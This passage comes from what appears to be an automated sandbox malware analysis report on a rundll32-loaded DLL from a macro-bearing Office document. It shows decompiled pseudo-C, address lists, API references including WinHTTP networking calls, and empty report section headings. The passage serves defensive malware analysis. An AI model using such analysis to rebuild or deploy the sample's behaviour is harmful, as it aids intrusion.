						__ecx =  *(__ebp - 0x3c);
						__esp[2] = 0x1c;
						__esp[1] =  *(__ebp - 0x3c);
						_t8 = __eax + 4; // 0x690073
						__eax =  *_t8;
						 *__esp =  *_t8;
						__eax = VirtualQuery(??, ??, ??);
						__esp = __esp - 0xc;
						__eflags = __eax;
						if(__eax == 0) {
							__ecx =  *0x63c3a7dc; // 0x1fe160
							__ecx = __ecx + __edi;
							__eflags = __ecx;
							_t17 = __ecx + 4; // 0x690073
							__eax =  *_t17;
							__esp[2] =  *_t17;
							_t19 = __ecx + 8; // 0x650064
							_t20 =  *_t19 + 8; // 0x222ceaa
							 *_t20 = E63C13A00(__ecx, __edx, "  VirtualQuery failed for %d bytes at address %p",  *_t20);
							__eax = E63C13A00(__ecx, __edx, "  Unknown pseudo relocation protocol version %d.\n", __eax);
							0;
							0;
							_push(__ebp);
							_push(__edi);
							_push(__esi);
							__esp = __esp - 0x1c;
							 *__esp = 0x63c3a7e8;
							EnterCriticalSection(__ebx);
							__ebx =  *0x63c3a7e0; // 0x0
							__esp = __esp - 4;
							__ebp = TlsGetValue;
							__edi = GetLastError;
							__eflags = __ebx;
							while(__ebx != 0) {
								__eax =  *__ebx;
								__eax = TlsGetValue( *__ebx);
								__esp = __esp - 4;
								__esi = __eax;
								__eax = GetLastError();
								__eflags = __eax;
								if(__eax == 0) {
									__eflags = __esi;
									if(__esi != 0) {
										__eax =  *(__ebx + 4);
										 *__esp = __esi;
										__eax =  *( *(__ebx + 4))();
									}
								}
								__ebx =  *(__ebx + 8);
								__eflags = __ebx;
							}
							LeaveCriticalSection(0x63c3a7e8);
							__esp = __esp - 4;
							__esp =  &(__esp[7]);
							_pop(__ebx);
							_pop(__esi);
							_pop(__edi);
							_pop(__ebp);
							return __eax;
						} else {
							__eax = __ebp - 0x38;
							__esp[3] = __ebp - 0x38;
							__eax =  *0x63c3a7dc; // 0x1fe160
							__esp[2] = __eax;
							__eax =  *(__ebp - 0x28);
							__esp[1] =  *(__ebp - 0x28);
							__eax =  *(__ebp - 0x34);
							 *__esp =  *(__ebp - 0x34);
							__eax = VirtualProtect(??, ??, ??, ??);
							__esp = __esp - 0x10;
							continue;
						}
					}
					L15:
				}
				return _t25;
				goto L15;
			}

0x63c13e10
0x63c13e10
0x63c13e13
0x63c13e19
0x00000000
0x00000000
0x63c13e1b
0x63c13e1e
0x63c13e23
0x63c13e2a
0x63c13e2c
0x63c13e2e
0x63c13e30
0x00000000
0x63c13e32
0x63c13e32
0x63c13e35
0x63c13e3d
0x63c13e41
0x63c13e41
0x63c13e44
0x63c13e47
0x63c13e4d
0x63c13e50
0x63c13e52
0x63c13f3f
0x63c13f45
0x63c13f45
0x63c13f47
0x63c13f47
0x63c13f4a
0x63c13f4e
0x63c13f51
0x63c13f5f
0x63c13f6f
0x63c13f7a
0x63c13f7e
0x63c13f80
0x63c13f81
0x63c13f82
0x63c13f84
0x63c13f87
0x63c13f8e
0x63c13f94
0x63c13f9a
0x63c13f9d
0x63c13fa3
0x63c13fa9
0x63c13fab
0x63c13fb0
0x63c13fb5
0x63c13fb7
0x63c13fba
0x63c13fbc
0x63c13fbe
0x63c13fc0
0x63c13fc2
0x63c13fc4
0x63c13fc6
0x63c13fc9
0x63c13fcc
0x63c13fcc
0x63c13fc4
0x63c13fce
0x63c13fd1
0x63c13fd1
0x63c13fdc
0x63c13fe2
0x63c13fe5
0x63c13fe8
0x63c13fe9
0x63c13fea
0x63c13feb
0x63c13fec
0x63c13e58
0x63c13e58
0x63c13e5b
0x63c13e5f
0x63c13e67
0x63c13e6b
0x63c13e6e
0x63c13e72
0x63c13e75
0x63c13e78
0x63c13e7e
0x00000000
0x63c13e7e
0x63c13e52
0x00000000
0x63c13e30
0x63c13db7
0x00000000

APIs

Part of subcall function 63C13A00: fwrite.MSVCRT ref: 63C13A2B
Part of subcall function 63C13A00: vfprintf.MSVCRT ref: 63C13A47
Part of subcall function 63C13A00: abort.MSVCRT ref: 63C13A4C
Part of subcall function 63C13A00: VirtualQuery.KERNEL32 ref: 63C13B0A
Part of subcall function 63C13A00: VirtualQuery.KERNEL32 ref: 63C13B43
Part of subcall function 63C13A00: memcpy.MSVCRT ref: 63C13B71
Part of subcall function 63C13A00: VirtualProtect.KERNEL32 ref: 63C13BA5
Part of subcall function 63C13A00: memcpy.MSVCRT ref: 63C13BBD
Part of subcall function 63C13A00: VirtualProtect.KERNEL32 ref: 63C13BEB
Part of subcall function 63C13A00: VirtualProtect.KERNEL32 ref: 63C13C35
Part of subcall function 63C13A00: GetLastError.KERNEL32 ref: 63C13C4A
Part of subcall function 63C13A00: VirtualProtect.KERNEL32 ref: 63C13E78

VirtualQuery.KERNEL32 ref: 63C13E47

Strings

%-=wOm>w, xrefs: 63C13E78

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 63C13BF9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28

APIs

Part of subcall function 63C13A00: fwrite.MSVCRT ref: 63C13A2B
Part of subcall function 63C13A00: vfprintf.MSVCRT ref: 63C13A47
Part of subcall function 63C13A00: abort.MSVCRT ref: 63C13A4C
Part of subcall function 63C13A00: VirtualQuery.KERNEL32 ref: 63C13B0A
Part of subcall function 63C13A00: memcpy.MSVCRT ref: 63C13B71
Part of subcall function 63C13A00: VirtualProtect.KERNEL32 ref: 63C13BA5
Part of subcall function 63C13A00: memcpy.MSVCRT ref: 63C13BBD
Part of subcall function 63C13A00: VirtualProtect.KERNEL32 ref: 63C13BEB
Part of subcall function 63C13A00: VirtualProtect.KERNEL32 ref: 63C13C35
Part of subcall function 63C13A00: GetLastError.KERNEL32 ref: 63C13C4A
Part of subcall function 63C13A00: VirtualQuery.KERNEL32 ref: 63C13E47
Part of subcall function 63C13A00: VirtualProtect.KERNEL32 ref: 63C13E78

VirtualQuery.KERNEL32 ref: 63C13B43

Strings

Om>w, xrefs: 63C13C04

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 00221969, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20

APIs

fprintf.MSVCRT ref: 00221946
fputc.MSVCRT ref: 00221977

Strings

%07X, xrefs: 00221934

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 0022EB29, Relevance: 5.1, APIs: 4, Instructions: 138

APIs

free.MSVCRT ref: 0022EB7B
free.MSVCRT ref: 0022EB87
free.MSVCRT ref: 0022EB93
free.MSVCRT ref: 0022EDAF

Part of subcall function 0022CFD0: calloc.MSVCRT ref: 0022D01E
Part of subcall function 0022CFD0: memcpy.MSVCRT ref: 0022D05C
Part of subcall function 0022CFD0: calloc.MSVCRT ref: 0022D0A2

Sleep.KERNEL32 ref: 0022EBA9

Part of subcall function 0022D930: rand.MSVCRT ref: 0022DA10
Part of subcall function 0022D930: free.MSVCRT ref: 0022DABF

Part of subcall function 0022D210: rand.MSVCRT ref: 0022D22F
Part of subcall function 0022D210: calloc.MSVCRT ref: 0022D244
Part of subcall function 0022D210: rand.MSVCRT ref: 0022D251
Part of subcall function 0022D210: free.MSVCRT ref: 0022D2B3
Part of subcall function 0022D210: calloc.MSVCRT ref: 0022D306
Part of subcall function 0022D210: free.MSVCRT ref: 0022D33C
Part of subcall function 0022D210: free.MSVCRT ref: 0022D344
Part of subcall function 0022D210: free.MSVCRT ref: 0022D378
Part of subcall function 0022D210: free.MSVCRT ref: 0022D384

Part of subcall function 0022D4A0: rand.MSVCRT ref: 0022D4E8
Part of subcall function 0022D4A0: calloc.MSVCRT ref: 0022D4FD
Part of subcall function 0022D4A0: rand.MSVCRT ref: 0022D520
Part of subcall function 0022D4A0: rand.MSVCRT ref: 0022D539
Part of subcall function 0022D4A0: calloc.MSVCRT ref: 0022D624
Part of subcall function 0022D4A0: strlen.MSVCRT ref: 0022D66C
Part of subcall function 0022D4A0: malloc.MSVCRT ref: 0022D6ED
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D7A9
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D7BD
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D7C5
Part of subcall function 0022D4A0: malloc.MSVCRT ref: 0022D84D
Part of subcall function 0022D4A0: free.MSVCRT ref: 0022D85E

Part of subcall function 0022E080: wcslen.MSVCRT ref: 0022E102
Part of subcall function 0022E080: calloc.MSVCRT ref: 0022E11F
Part of subcall function 0022E080: wcslen.MSVCRT ref: 0022E129
Part of subcall function 0022E080: memcpy.MSVCRT ref: 0022E13B
Part of subcall function 0022E080: wcslen.MSVCRT ref: 0022E143
Part of subcall function 0022E080: MultiByteToWideChar.KERNEL32 ref: 0022E17F
Part of subcall function 0022E080: WinHttpCloseHandle.WINHTTP ref: 0022E1EE
Part of subcall function 0022E080: WinHttpCloseHandle.WINHTTP ref: 0022E201
Part of subcall function 0022E080: WinHttpSetStatusCallback.WINHTTP(?,?,?,?,?,?,?,?,?,00000000,?,?,0022E564), ref: 0022E235
Part of subcall function 0022E080: WinHttpCloseHandle.WINHTTP ref: 0022E245
Part of subcall function 0022E080: free.MSVCRT ref: 0022E25E
Part of subcall function 0022E080: GetModuleHandleW.KERNEL32 ref: 0022E2E7
Part of subcall function 0022E080: WinHttpOpen.WINHTTP(?,?,?,?,?,?,?,?,?,?,00000000,?,?,0022E564), ref: 0022E321
Part of subcall function 0022E080: WinHttpSetOption.WINHTTP ref: 0022E363
Part of subcall function 0022E080: WinHttpSetStatusCallback.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0022E391
Part of subcall function 0022E080: WinHttpSetTimeouts.WINHTTP ref: 0022E3C6
Part of subcall function 0022E080: GetLastError.KERNEL32 ref: 0022E3E0
Part of subcall function 0022E080: free.MSVCRT ref: 0022E3FE

Part of subcall function 0022D3A0: calloc.MSVCRT ref: 0022D3C6
Part of subcall function 0022D3A0: free.MSVCRT(?,?,?,?,?,?,00000000,?,?,0022E57B), ref: 0022D3FB
Part of subcall function 0022D3A0: free.MSVCRT ref: 0022D45F
Part of subcall function 0022D3A0: free.MSVCRT ref: 0022D46B
Part of subcall function 0022D3A0: free.MSVCRT ref: 0022D485

Part of subcall function 0022DB10: free.MSVCRT ref: 0022DBFF
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC1E
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC5E
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC7B
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DC99
Part of subcall function 0022DB10: free.MSVCRT ref: 0022DCA3

Part of subcall function 0022D0B0: memcpy.MSVCRT ref: 0022D13A
Part of subcall function 0022D0B0: calloc.MSVCRT ref: 0022D159

free.MSVCRT ref: 0022ED81
free.MSVCRT ref: 0022ED8D
free.MSVCRT ref: 0022ED99

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 0022D809, Relevance: 5.1, APIs: 4, Instructions: 65

APIs

strlen.MSVCRT ref: 0022D66C
malloc.MSVCRT ref: 0022D6ED
malloc.MSVCRT ref: 0022D84D

Part of subcall function 0022CFD0: calloc.MSVCRT ref: 0022D01E
Part of subcall function 0022CFD0: memcpy.MSVCRT ref: 0022D05C
Part of subcall function 0022CFD0: calloc.MSVCRT ref: 0022D0A2

free.MSVCRT ref: 0022D7A9
free.MSVCRT ref: 0022D7BD
free.MSVCRT ref: 0022D7C5
free.MSVCRT ref: 0022D85E

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 63C14067, Relevance: 5.0, APIs: 4, Instructions: 48

APIs

EnterCriticalSection.KERNEL32 ref: 63C14097
LeaveCriticalSection.KERNEL32 ref: 63C140C8
free.MSVCRT ref: 63C140E9
LeaveCriticalSection.KERNEL32 ref: 63C140F5

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 00236257, Relevance: 5.0, APIs: 4, Instructions: 48

APIs

EnterCriticalSection.KERNEL32 ref: 00236287
LeaveCriticalSection.KERNEL32 ref: 002362B8
free.MSVCRT ref: 002362D9
LeaveCriticalSection.KERNEL32 ref: 002362E5

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 63C13F80, Relevance: 5.0, APIs: 4, Instructions: 39

APIs

EnterCriticalSection.KERNEL32 ref: 63C13F8E
TlsGetValue.KERNEL32 ref: 63C13FB5
GetLastError.KERNEL32 ref: 63C13FBC
LeaveCriticalSection.KERNEL32 ref: 63C13FDC

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 00236170, Relevance: 5.0, APIs: 4, Instructions: 39

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00236395,?,?,?,?,?,?,002358B8), ref: 0023617E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00236395,?,?,?,?,?,?,002358B8), ref: 002361A5
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00236395,?,?,?,?,?,?,002358B8), ref: 002361AC
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00236395,?,?,?,?,?,?,002358B8), ref: 002361CC

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 63C06F70, Relevance: 5.0, APIs: 4, Instructions: 33

C-Code - Quality: 21%

			E63C06F70(void* _a4) {
				void _v40;
				void* _t6;
				void* _t8;
				void* _t12;
				void* _t14;
				void* _t22;
				void* _t23;
				intOrPtr* _t24;
				void** _t25;

				_t24 = _t23 - 0x1c;
				_t22 = _a4;
				 *_t24 = 0x224;
				_t6 = malloc(??);
				_t14 = _t6;
				_t8 = memcpy(_t6, _t22, 0x89 << 2);
				_t25 = _t24 + 0xc;
				if(_t8 != 0) {
					 *_t25 = _t8;
					 *_t25 = wcslen(??) + _t10 + 2;
					_t12 = malloc(??);
					 *_t25 = _t12;
					 *_t14 = _t12;
					_v40 =  *_t22;
					wcscpy(??, ??);
				}
				return _t14;
			}

0x63c06f74
0x63c06f77
0x63c06f7b
0x63c06f82
0x63c06f89
0x63c06f95
0x63c06f95
0x63c06f99
0x63c06f9b
0x63c06fa7
0x63c06faa
0x63c06fb2
0x63c06fb5
0x63c06fb7
0x63c06fbb
0x63c06fbb
0x63c06fc9

APIs

malloc.MSVCRT ref: 63C06F82
wcslen.MSVCRT ref: 63C06F9E
malloc.MSVCRT ref: 63C06FAA
wcscpy.MSVCRT ref: 63C06FBB

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 00232DB9, Relevance: 5.0, APIs: 4, Instructions: 20

APIs

LocalFree.KERNEL32 ref: 00232D8D
free.MSVCRT ref: 00232D99
free.MSVCRT ref: 00232DA1
free.MSVCRT ref: 00232DA9

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Error!

Analysis Report

Overview

General Information

Detection

Classification

Analysis Advice

Signature Overview

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Software Vulnerablities:

Networking:

Boot Survival:

Persistence and Installation Behavior:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Behavior Graph

Yara Overview

Screenshot

Startup

Created / dropped Files

Download Dropped Binaries

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Static File Info

General

File Icon

Static OLE Info

General

OLE File

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Class1.cls, Stream Size: 5637

General

VBA Code with Deobfuscations

VBA Code

VBA File Name: Module1.bas, Stream Size: 82528

General

VBA Code with Deobfuscations

VBA Code

VBA File Name: ThisDocument.cls, Stream Size: 1097

General

VBA Code with Deobfuscations

VBA Code

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 121

General

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: 1Table, File Type: data, Stream Size: 8624

General

Stream Path: Data, File Type: data, Stream Size: 137675

General

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 451

General

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 86

General

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4934

General

Stream Path: Macros/VBA/__SRP_0, File Type: data, Stream Size: 1238

General

Stream Path: Macros/VBA/__SRP_1, File Type: data, Stream Size: 110

General